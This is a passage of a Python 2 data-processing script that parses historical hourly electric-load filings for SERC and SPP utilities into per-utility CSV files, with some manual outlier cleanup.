1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCEG97' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCEG98' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCEG99' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCEG00' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCEG01' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values
},
17543 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCPS93' % (fulldir)).readlines()[:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCPS96' % (fulldir)).readlines()[:-1]]).astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCPS97' % (fulldir)).readlines()[1:-3]]).iloc[:, 4:-1].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCPS98' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].replace('NA', '0').astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCPS99' % (fulldir)).readlines()[1:-1]]).iloc[:, 2:-1].replace('NA', '0').astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCPS00' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCPS01' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/serc/2002/SCPS02' % (fulldir), header=None).dropna(axis=1, how='all').iloc[:, 2:-1].values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SCPS03' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/SCPS04' % (fulldir)).readlines()[1:]]).iloc[:, 1:-1].replace('NA', '0').astype(float).values.ravel()
},
17568 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/SMEA93' % (fulldir)).readlines()[5:]])[2].astype(float)/1000).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/SMEA94' % (fulldir)).readlines()[5:]]).iloc[:, -1].astype(float)).values,
1996 : ((pd.DataFrame([i.split() for i in open('%s/serc/1996/SMEA96' % (fulldir)).readlines()[:]])).iloc[:, -24:].astype(float)/1000).values.ravel(),
1997 : pd.read_excel('%s/serc/1997/SMEA97' % (fulldir), sheetname=1, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SMEA98' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SMEA99' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SMEA00' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/SMEA02' % (fulldir)).readlines()[2:]])[2].astype(float).values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SMEA03' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel()
},
18642 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/TVA93' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/TVA94' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/TVA95' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/TVA96' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/TVA97' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/TVA98' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/TVA99' % (fulldir)).iloc[:, 2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/TVA00' % (fulldir)).iloc[:, 2].astype(float).values,
2001 : pd.read_excel('%s/serc/2001/TVA01' % (fulldir), header=None, skiprows=3).iloc[:, 2].astype(float).values,
2003 : pd.read_excel('%s/serc/2003/TVA03' % (fulldir)).iloc[:, -1].values
},
19876 : {
1993 : pd.read_fwf('%s/serc/1993/VIEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/serc/1994/VIEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/serc/1995/VIEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/serc/1996/VIEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/serc/1997/VIEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/serc/1998/VIEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/serc/1999/VIEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/VIEP00' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/VIEP01' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/VIEP02' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/VIEP03' % (fulldir)).readlines()[2:]])[3].astype(float)).values.ravel(),
2004 : (pd.DataFrame([i.split() for i in open('%s/serc/2004/VIEP04' % (fulldir)).readlines()[:]])[3].astype(float)).values.ravel()
},
20065 : {
1993 : pd.read_fwf('%s/serc/1993/WEMC93' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1995 : (pd.read_csv('%s/serc/1995/WEMC95' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True)[3]/1000).values,
1996 : (pd.read_excel('%s/serc/1996/WEMC96' % (fulldir))['Load']/1000).values,
1997 : pd.read_excel('%s/serc/1997/WEMC97' % (fulldir), skiprows=4)['MW'].values,
1998 : pd.concat([pd.read_excel('%s/serc/1998/WEMC98' % (fulldir), sheetname=i).iloc[:, -1] for i in range(12)]).values,
1999 : pd.read_excel('%s/serc/1999/WEMC99' % (fulldir))['mwh'].values,
2000 : (pd.read_excel('%s/serc/2000/WEMC00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.read_excel('%s/serc/2001/WEMC01' % (fulldir), header=None)[0]/1000).values
},
4958 : {
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/DU99' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/DU00' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2003 : pd.read_excel('%s/serc/2003/DU03' % (fulldir)).iloc[:, -1].values
},
924 : {
1999 : pd.read_excel('%s/serc/1999/AECI99' % (fulldir))['CALoad'].values,
2001 : pd.read_excel('%s/serc/2001/AECI01' % (fulldir)).iloc[:, -1].values,
2002 : pd.Series(pd.read_excel('%s/serc/2002/AECI02' % (fulldir), skiprows=3).loc[:, 'Jan':'Dec'].values.ravel(order='F')).dropna().values
},
402290 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECD96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECD97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECD98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECD99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECD00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECD01' % (fulldir)).readlines()[3:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECD02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECD03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECD04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
402291 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECV96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECV97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECV98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECV99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECV00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECV01' % (fulldir)).readlines()[3:]])[4].dropna().str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECV02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECV03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECV04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
195 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/APCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/APCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Alabama'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 2].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Alabama'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 2].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 2].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 1].values
},
7140 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).replace(np.nan, 0).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Georgia'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 3].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Georgia'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 3].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 3].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 2].values
},
7801 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GUCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GUCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Gulf'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 4].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Gulf'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 4].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 4].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 3].values
},
12686 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/MPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/MPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Mississippi'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 5].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Mississippi'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 5].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 5].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 4].values
},
16687 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/SECO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/SECO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Savannah'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 6].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Savannah'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 6].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 6].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 5].values
},
18195 : {
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['System'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 7].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Southern'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 7].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 8].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 7].values
}
}
# Merge the two sub-area series 402290 and 402291 into a single combined
# utility under ID 40229 (entries presumably defined earlier in the file —
# not visible here). Assumes both sub-dicts share identical year keys and
# equal-length arrays for each year.
serc.update({40229 : {}})
for i in serc[402290].keys():
    serc[40229][i] = serc[402290][i] + serc[402291][i]
# Manual outlier scrubbing: zero out values that are clearly bad parses
# (implausibly large loads, or negative loads). Zeros are converted to NaN
# below, so these become missing data rather than spikes.
serc[189][2001][serc[189][2001] > 2000] = 0
serc[3408][2002][serc[3408][2002] > 2000] = 0
serc[3408][2003][serc[3408][2003] > 2000] = 0
serc[7140][1999][serc[7140][1999] < 0] = 0
serc[7140][1994][serc[7140][1994] > 20000] = 0
# Export one CSV per utility: concatenate every available year into one
# hourly-indexed series (each year's index starts Jan 1 and runs for as many
# hours as that year's array holds), sort chronologically, and replace 0
# with NaN to mark missing observations.
if not os.path.exists('./serc'):
    os.mkdir('serc')
for k in serc.keys():
    print k
    s = pd.DataFrame(pd.concat([pd.Series(serc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(serc[k][i]))) for i in serc[k].keys()]).sort_index(), columns=['load'])
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./serc/%s.csv' % k)
###### SPP
# AECC: 807
# CAJN: 2777
# CLEC: 3265
# EMDE: 5860
# ENTR: 12506
# KCPU: 9996
# LEPA: 26253
# LUS: 9096
# GSU: 55936 <- 7806
# MPS: 12699
# OKGE: 14063
# OMPA: 14077
# PSOK: 15474
# SEPC: 18315
# WFEC: 20447
# WPEK: 20391
# CSWS: 3283
# SRGT: 40233
# GSEC: 7349
# Hourly load data for SPP control areas, keyed by EIA utility ID, then by
# year. Each leaf value is a 1-D numpy array of hourly loads parsed from the
# raw filings under <fulldir>/spp/<year>/; file layout varies per utility
# and year, hence the per-file parsing recipes.
spp = {
    807 : {
        1993 : pd.read_csv('%s/spp/1993/AECC93' % (fulldir), skiprows=6, skipfooter=1, header=None).iloc[:, -1].values,
        1994 : pd.read_csv('%s/spp/1994/AECC94' % (fulldir), skiprows=8, skipfooter=1, header=None).iloc[:, -1].values,
        1995 : pd.read_csv('%s/spp/1995/AECC95' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
        1996 : pd.read_csv('%s/spp/1996/AECC96' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
        1997 : pd.read_csv('%s/spp/1997/AECC97' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
        1998 : pd.read_csv('%s/spp/1998/AECC98' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
        1999 : pd.read_csv('%s/spp/1999/AECC99' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -1].values,
        2003 : pd.read_csv('%s/spp/2003/AECC03' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -2].values,
        2004 : pd.read_csv('%s/spp/2004/AECC04' % (fulldir), skiprows=5, header=None).iloc[:, -2].values
    },
    2777 : {
        1998 : pd.read_excel('%s/spp/1998/CAJN98' % (fulldir), skiprows=4).iloc[:365, 1:].values.ravel(),
        1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CAJN99' % (fulldir)).readlines()[:]])[2].astype(float).values
    },
    3265 : {
        1994 : pd.read_fwf('%s/spp/1994/CLEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/CLEC96' % (fulldir)).readlines()[:]])[0].astype(float).values,
        1997 : pd.read_csv('%s/spp/1997/CLEC97' % (fulldir)).iloc[:, 2].str.replace(',', '').astype(float).values,
        1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/CLEC98' % (fulldir)).readlines()[:]])[1].astype(float).values,
        1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CLEC99' % (fulldir)).readlines()[1:]]).iloc[:, 0].astype(float).values,
        2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/CLEC01' % (fulldir)).readlines()[:]])[4].replace('NA', '0').astype(float).values,
    },
    5860 : {
        1997 : pd.DataFrame([i.split() for i in open('%s/spp/1997/EMDE97' % (fulldir)).readlines()[:]])[3].astype(float).values,
        1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/EMDE98' % (fulldir)).readlines()[2:-2]])[2].astype(float).values,
        1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/EMDE99' % (fulldir)).readlines()[3:8763]])[2].astype(float).values,
        2001 : pd.read_excel('%s/spp/2001/EMDE01' % (fulldir))['Load'].dropna().values,
        2002 : pd.read_excel('%s/spp/2002/EMDE02' % (fulldir))['Load'].dropna().values,
        2003 : pd.read_excel('%s/spp/2003/EMDE03' % (fulldir))['Load'].dropna().values,
        2004 : pd.read_excel('%s/spp/2004/EMDE04' % (fulldir), skiprows=2).iloc[:8784, -1].values
    },
    12506 : {
        1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/ENTR94' % (fulldir)).readlines()[:]]).iloc[:, 1:-1].astype(float).values.ravel(),
        1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/ENTR95' % (fulldir)).readlines()[1:-2]]).iloc[:, 1:-1].astype(float).values.ravel(),
        1997 : pd.read_csv('%s/spp/1997/ENTR97' % (fulldir), header=None).iloc[:, 1:-1].astype(float).values.ravel(),
        1998 : pd.read_csv('%s/spp/1998/ENTR98' % (fulldir), header=None)[2].astype(float).values,
        1999 : pd.read_excel('%s/spp/1999/ENTR99' % (fulldir)).iloc[:, -1].values,
        2000 : pd.DataFrame([i.split() for i in open('%s/spp/2000/ENTR00' % (fulldir)).readlines()[4:]]).iloc[:, 3:].astype(float).values.ravel(),
        2001 : pd.read_fwf('%s/spp/2001/ENTR01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
    },
    9996 : {
        1994 : pd.read_fwf('%s/spp/1994/KCPU94' % (fulldir), skiprows=4, header=None).astype(str).apply(lambda x: x.str[-3:]).astype(float).values.ravel(),
        1997 : pd.read_csv('%s/spp/1997/KCPU97' % (fulldir), engine='python', header=None)[0].values,
        1998 : pd.read_csv('%s/spp/1998/KCPU98' % (fulldir), engine='python', header=None)[0].values,
        1999 : pd.read_csv('%s/spp/1999/KCPU99' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
        2000 : pd.read_csv('%s/spp/2000/KCPU00' % (fulldir), engine='python', header=None)[0].values,
        2002 : pd.read_excel('%s/spp/2002/KCPU02' % (fulldir)).iloc[:, -1].values,
        2003 : pd.read_csv('%s/spp/2003/KCPU03' % (fulldir), engine='python', header=None)[0].values,
        2004 : pd.read_csv('%s/spp/2004/KCPU04' % (fulldir), engine='python', header=None)[0].values
    },
    26253 : {
        1993 : pd.read_csv('%s/spp/1993/LEPA93' % (fulldir), skiprows=3, header=None)[0].values,
        1994 : pd.read_csv('%s/spp/1994/LEPA94' % (fulldir), skiprows=3, header=None)[0].values,
        1995 : pd.read_csv('%s/spp/1995/LEPA95' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
        1996 : pd.read_csv('%s/spp/1996/LEPA96' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
        1997 : pd.read_csv('%s/spp/1997/LEPA97' % (fulldir), engine='python', header=None)[0].values,
        # BUGFIX: a duplicate 1998 key (a raw DataFrame, never .values-flattened)
        # used to precede this entry; dict literals keep only the last value for
        # a repeated key, so that line was dead code (the file was read twice
        # and the first result discarded). It has been removed.
        1998 : pd.Series(pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[[1,3]].values.ravel(order='F')).dropna().values,
        1999 : pd.read_csv('%s/spp/1999/LEPA99' % (fulldir), sep='\t')['Load'].values,
        2001 : pd.read_csv('%s/spp/2001/LEPA01' % (fulldir), engine='python', sep='\t', header=None)[1].values,
        2002 : pd.read_csv('%s/spp/2002/LEPA02' % (fulldir), engine='python', sep='\t', header=None)[1].values,
        2003 : pd.read_excel('%s/spp/2003/LEPA03' % (fulldir), header=None)[1].values
    },
    9096 : {
        1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/LUS93' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
        1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/LUS94' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
        1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/LUS95' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
        1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/LUS96' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
        1997 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1997/LUS97' % (fulldir)).readlines()[3:-2]]).iloc[:, -1].astype(float).values,
        1998 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1998/LUS98' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
        1999 : pd.DataFrame([i.split(' ') for i in open('%s/spp/1999/LUS99' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
        2000 : pd.read_csv('%s/spp/2000/LUS00' % (fulldir), skiprows=3, skipfooter=1, header=None).iloc[:, -1].values,
        2001 : pd.read_csv('%s/spp/2001/LUS01' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
        2002 : pd.read_csv('%s/spp/2002/LUS02' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
        2003 : pd.read_csv('%s/spp/2003/LUS03' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
        2004 : pd.read_csv('%s/spp/2004/LUS04' % (fulldir), skiprows=4, header=None).iloc[:, -1].values
    },
    55936 : {
        1993 : pd.read_csv('%s/spp/1993/GSU93' % (fulldir), engine='python', header=None)[0].values
    },
    12699 : {
        1993 : pd.read_csv('%s/spp/1993/MPS93' % (fulldir), sep=' ', skipinitialspace=True)['TOTLOAD'].values,
        1996 : pd.read_excel('%s/spp/1996/MPS96' % (fulldir), skiprows=6, header=None).iloc[:, -1].values,
        1998 : pd.read_csv('%s/spp/1998/MPS98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        2000 : pd.read_csv('%s/spp/2000/MPS00' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        2001 : pd.read_csv('%s/spp/2001/MPS01' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        2002 : pd.read_csv('%s/spp/2002/MPS02' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
        2003 : pd.read_excel('%s/spp/2003/MPS03' % (fulldir)).iloc[:, 1:].values.ravel()
    },
    14063 : {
        1994 : pd.read_csv('%s/spp/1994/OKGE94' % (fulldir), header=None).iloc[:, 1:13].values.ravel()
    },
    14077 : {
        1993 : pd.read_csv('%s/spp/1993/OMPA93' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_csv('%s/spp/1997/OMPA97' % (fulldir), engine='python', header=None)[0].values,
        1998 : pd.read_csv('%s/spp/1998/OMPA98' % (fulldir), skiprows=2, engine='python', header=None)[0].str.replace('\*', '').astype(float).values,
        2000 : pd.read_csv('%s/spp/2000/OMPA00' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
        2001 : pd.read_csv('%s/spp/2001/OMPA01' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
        2002 : pd.read_csv('%s/spp/2002/OMPA02' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
        2003 : pd.read_csv('%s/spp/2003/OMPA03' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
        2004 : pd.read_csv('%s/spp/2004/OMPA04' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000
    },
    15474 : {
